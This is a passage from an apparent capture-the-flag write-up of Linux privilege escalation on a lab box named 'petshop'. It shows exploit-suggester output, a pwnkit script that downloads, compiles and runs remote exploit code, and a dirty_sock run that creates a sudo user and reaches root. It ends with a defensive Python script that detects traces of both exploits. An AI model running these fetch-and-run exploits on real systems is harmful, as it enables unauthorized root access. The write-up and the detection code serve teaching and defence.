Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2018-18955] subuid_shell

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-7304] dirty_sock

Details: https://initblog.com/2019/dirty-sock/
Exposure: less probable
Tags: ubuntu=18.10,mint=19
Download URL: https://github.com/initstring/dirty_sock/archive/master.zip
Comments: Distros use own versioning scheme. Manual verification needed.

[+] [CVE-2019-18634] sudo pwfeedback

Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-0358] ntfs-3g-modprobe

Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

Since nothing better is available for now, try kernel privilege escalation.

pwnkit

Download it from https://codeload.github.com/berdav/CVE-2021-4034/zip/main, copy the contents of the .sh file inside into a new exp.sh on the target, and try running it.

www-data@petshop:/tmp$ cat exp.sh
cat exp.sh
#!/usr/bin/env sh

URL=https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/

for EXPLOIT in "${URL}/cve-2021-4034.c" \
"${URL}/pwnkit.c" \
"${URL}/Makefile"
do
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done

make

./cve-2021-4034
www-data@petshop:/tmp$ chmod 777 exp.sh
chmod 777 exp.sh
www-data@petshop:/tmp$ ./exp.sh
./exp.sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Privilege escalation succeeds straight away.

dirtysock

Besides pwnkit, dirty_sock also escalates privileges. There are actually two dirty_sock exploit scripts: version 1 needs an RSA public key you generate yourself, which I could not be bothered with, while version 2 creates a user directly, which is more convenient. So try version 2 first and fall back to version 1 if it fails.

www-data@petshop:/tmp$ python3 ./4	
python3 ./46362

___ _ ____ ___ _ _ ____ ____ ____ _ _
| \ | |__/ | \_/ [__ | | | |_/
|__/ | | \ | | ___ ___] |__| |___ | \_
(version 2)

//=========[]==========================================\\
|| R&D || initstring (@init_string) ||
|| Source || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock ||
\\=========[]==========================================//


[+] Slipped dirty sock on random socket file: /tmp/daqnoauofi;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...



********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************



www-data@petshop:/tmp$ su dirty_sock
su dirty_sock
su: must be run from a terminal
www-data@petshop:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@petshop:/tmp$ su dirty_sock
su dirty_sock
Password: dirty_sock

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

dirty_sock@petshop:/tmp$ id
id
uid=1001(dirty_sock) gid=1001(dirty_sock) groups=1001(dirty_sock),27(sudo)
dirty_sock@petshop:/tmp$ sudo su
sudo su
[sudo] password for dirty_sock: dirty_sock

root@petshop:/tmp# cd /root
cd /root
root@petshop:~# ls -la
ls -la
total 24
drwx------ 3 root root 4096 Jun 3 18:32 .
drwxr-xr-x 23 root root 4096 Apr 9 2021 ..
lrwxrwxrwx 1 root root 9 Apr 10 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 38 Apr 30 2021 root.txt
drwx------ 3 root root 4096 Jun 3 18:32 snap
root@petshop:~# cat ro
cat root.txt
THM{get_it_urself}
root@petshop:~#

Root flag obtained.
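Both escalation paths above leave host-side traces: pkexec logs a rejection of the caller's environment when CVE-2021-4034 is triggered through its usual path, dirty_sock binds a Unix socket whose name carries ";uid=0;" (visible in the output above as /tmp/daqnoauofi;uid=0;) so that snapd's peer-credential parser reads a forged uid, and the version 2 script adds a user to the sudo group. The Python below is an added triage example, not part of this write-up or of either exploit. The auth.log lines, /proc/net/unix rows and /etc/group content are constructed samples, and the two pkexec message strings are the ones polkit's pkexec.c emits (including its "suscipious" spelling). An exploit variant that avoids the logging path leaves no such line, so an empty result is not a clean bill of health.

```python
import re

# Constructed samples standing in for /var/log/auth.log, /proc/net/unix and /etc/group
# on a host like the one in the write-up. None of this is captured from the target.
AUTH_LOG = """\
Jun  3 18:20:11 petshop sshd[1402]: Accepted publickey for robyn from 10.10.5.5 port 50112 ssh2
Jun  3 18:31:02 petshop pkexec[2077]: www-data: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=]
Jun  3 18:31:05 petshop pkexec[2081]: www-data: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=/usr/bin/true]
Jun  3 18:40:44 petshop sudo:    robyn : TTY=pts/0 ; PWD=/home/robyn ; USER=root ; COMMAND=/usr/bin/apt update
"""

PROC_NET_UNIX = """\
Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 18822 /run/snapd.socket
0000000000000000: 00000002 00000000 00010000 0001 01 18823 /run/snapd-snap.socket
0000000000000000: 00000003 00000000 00000000 0001 03 40211 /tmp/daqnoauofi;uid=0;
0000000000000000: 00000002 00000000 00000000 0001 03 40300
0000000000000000: 00000002 00000000 00010000 0001 01 15102 /run/dbus/system_bus_socket
"""

ETC_GROUP = """\
root:x:0:
sudo:x:27:robyn,dirty_sock
www-data:x:33:
dirty_sock:x:1001:
"""

# Messages pkexec writes (via syslog, ident "pkexec") when it rejects the caller's environment.
PKEXEC_MARKERS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",   # sic: this is the spelling in pkexec.c
)


def pkexec_indicators(auth_log: str) -> list:
    """auth.log lines that pkexec emitted for a rejected environment variable. CVE-2021-4034
    exploitation that goes through the normal validation path typically leaves one of these."""
    return [
        ln for ln in auth_log.splitlines()
        if re.search(r"\bpkexec\[\d+\]:", ln) and any(m in ln for m in PKEXEC_MARKERS)
    ]


def injected_socket_paths(proc_net_unix: str) -> list:
    """Unix socket paths carrying a ';uid=<n>;' fragment: the dirty_sock trick that makes snapd
    parse a forged uid out of the client's socket name. Rows without a path are skipped."""
    hits = []
    for ln in proc_net_unix.splitlines()[1:]:      # first row is the column header
        fields = ln.split(None, 7)                  # path is the 8th column when present
        if len(fields) == 8 and re.search(r";uid=\d+;", fields[7]):
            hits.append(fields[7])
    return hits


def unexpected_sudoers(etc_group: str, baseline: set) -> list:
    """Members of the sudo group that are not in the administrator baseline the operator supplies."""
    for ln in etc_group.splitlines():
        name, _, _, members = ln.split(":")
        if name == "sudo":
            return sorted(m for m in members.split(",") if m and m not in baseline)
    return []


if __name__ == "__main__":
    for ln in pkexec_indicators(AUTH_LOG):
        print("[pkexec] ", ln)
    for p in injected_socket_paths(PROC_NET_UNIX):
        print("[dirty_sock socket] ", p)
    for u in unexpected_sudoers(ETC_GROUP, baseline={"robyn"}):
        print("[unexpected sudo member] ", u)
```

On a live host the three inputs come from /var/log/auth.log (or the journal), /proc/net/unix (or ss -xl) and /etc/group; the sudo baseline is whatever your configuration management says the group should contain. The socket-name check is cheap enough to run from a periodic job, and a sudo-group member that nobody provisioned is worth an alert regardless of how it got there.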